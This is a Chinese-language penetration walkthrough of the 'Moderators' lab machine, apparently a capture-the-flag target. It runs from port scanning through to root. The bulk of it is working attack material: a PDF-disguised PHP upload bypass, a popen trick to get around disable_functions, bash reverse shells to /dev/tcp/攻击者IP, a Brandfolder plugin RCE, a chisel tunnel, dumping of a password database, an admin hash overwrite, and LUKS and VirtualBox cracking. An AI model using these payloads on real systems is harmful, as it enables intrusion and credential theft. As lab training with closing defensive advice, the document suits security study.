实战打靶之Moderators
字数 1610 2025-08-11 22:57:21
Moderators 靶机实战渗透教学文档
信息收集阶段
端口扫描
使用nmap进行基础扫描:
nmap -sV -p- 目标IP
发现开放端口:
- 22 (SSH)
- 80 (HTTP)
Web应用侦察
- 初步浏览发现站点为托管服务/漏洞评估提供商
- 发现包含主机地址、漏洞类型的测试报告
- 报告通过ID参数访问,格式为
/report?id=XXXX
目录爆破
使用feroxbuster进行目录枚举:
feroxbuster -u http://目标IP -w /path/to/wordlist.txt
关键发现:
/logs目录存在/logs/e21cece511f43a5cb18d4932429915ed/子目录
ID枚举
使用wfuzz对报告ID进行枚举:
wfuzz -c -z range,0000-9999 http://目标IP/report?id=FUZZ
发现6个有效ID,其中3个未知
漏洞利用阶段
文件上传漏洞发现
- 通过枚举发现上传接口
- 上传参数名为
pdfFile - 服务器验证机制:
- MIME类型(Content-Type)
- 文件魔术字节(前5字节应为
%PDF-) - 文件扩展名
文件上传绕过技术
- 修改文件名:
z.pdf.php - 修改Content-Type:
application/pdf - 添加PDF魔术字节:
%PDF-
<?php phpinfo(); ?>
绕过disable_functions
发现大多数命令执行函数被禁用,使用popen函数绕过:
<?php
error_reporting(E_ALL);
$handle = popen('/bin/ls 2>&1', 'r');
echo "'$handle'; " . gettype($handle) . "\n";
$read = fread($handle, 2096);
echo $read;
pclose($handle);
?>
获取初始shell
- 使用curl反弹shell:
curl http://目标IP/uploaded_shell.php?cmd=bash+-c+"bash+-i+>%26+/dev/tcp/攻击者IP/端口+0>%261"
- 使用nc监听:
nc -lvnp 端口
内网横向移动
服务发现
- 使用netstat发现本地监听服务:
netstat -tulnp
- 确认存在WordPress站点运行在localhost
隧道搭建
使用chisel建立SOCKS隧道:
# 攻击机(服务端)
./chisel server -p 8000 --reverse
# 靶机(客户端)
./chisel client 攻击者IP:8000 R:socks
WordPress插件漏洞利用
发现Brandfolder插件漏洞(Exploit-DB):
- 使用curl触发RCE:
curl '127.0.0.1:8080/wp-content/plugins/brandfolder/callback.php?wp_abspath=/dev/shm/&cmd=bash+-c+"bash+-i+>%26+/dev/tcp/攻击者IP/5444+0>%261"'
数据库渗透
- 发现密码管理插件
pwds-manager.php - 分析数据库结构:
function pms_db_install() {
global $wpdb;
$table_name = $wpdb->prefix . 'pms_passwords';
$sql1 = "CREATE TABLE $table_name (
pass_id int(11) NOT NULL AUTO_INCREMENT,
user_name varchar(200) NOT NULL,
user_email varchar(200) NOT NULL,
user_password longtext NOT NULL,
category_id int(11) NOT NULL,
note text CHARACTER SET utf8 COLLATE utf8_general_ci NOT NULL,
url longtext NOT NULL,
PRIMARY KEY (pass_id)
)ENGINE=InnoDB DEFAULT CHARSET=latin1";
dbDelta($sql1);
}
- 数据库查询:
mysql -u wordpressuser -p'wordpresspassword123!!' wordpress
show tables;
select user_name,user_password from wp_pms_passwords;
WordPress管理员密码重置
- 使用在线工具生成WordPress密码哈希:
- 网站:https://www.useotools.com/es/wordpress-password-hash-generator/
- 更新数据库:
UPDATE `wp_users` SET `user_pass` = '$P$BqTMH6f2/YJmGLjPetfgm3MnNewMhS1' WHERE user_login = 'admin';
权限提升阶段
VirtualBox虚拟机破解
- 发现.vbox虚拟机配置文件
- 使用pyvboxdie-cracker工具破解加密:
python cracker.py encrypted.vbox
- 获取密码:
computer
LUKS磁盘加密破解
- 使用bruteforce-luks工具:
./bruteforce-luks-static-linux-amd64 -f wordlist.txt /dev/sda
- 获取密码:
abc123
最终root密码发现
在脚本文件中发现密码:
grep -r pass .
发现于all-in-one/distro_update.sh:
passwd='$_THE_best_Sysadmin_Ever_'
获取root权限
sudo -l
su root
密码: $_THE_best_Sysadmin_Ever_
关键知识点总结
-
文件上传绕过技术:
- 魔术字节伪造
- Content-Type修改
- 双重扩展名利用
-
PHP disable_functions绕过:
- popen函数利用
- Chankro工具(https://github.com/TarlogicSecurity/Chankro)
-
WordPress插件漏洞利用:
- Brandfolder插件RCE
- 密码管理插件数据库分析
-
加密系统破解:
- VirtualBox配置文件破解
- LUKS磁盘加密爆破
-
隧道技术:
- Chisel工具使用
- SOCKS代理建立
-
密码哈希处理:
- WordPress密码哈希生成与替换
-
权限提升路径:
- 配置文件密码泄露
- 脚本文件硬编码凭证
推荐工具列表
- 目录枚举:feroxbuster
- ID枚举:wfuzz
- 隧道工具:chisel
- PHP绕过工具:Chankro
- VirtualBox破解:pyvboxdie-cracker
- LUKS爆破:bruteforce-luks
- WordPress哈希生成:useotools.com
防御建议
-
文件上传:
- 使用白名单验证
- 服务器端MIME检测
- 文件内容严格验证
-
PHP安全:
- 限制危险函数
- 定期更新PHP版本
-
WordPress安全:
- 及时更新插件
- 删除不必要插件
- 使用强密码
-
系统安全:
- 避免硬编码凭证
- 使用强加密密码
- 限制sudo权限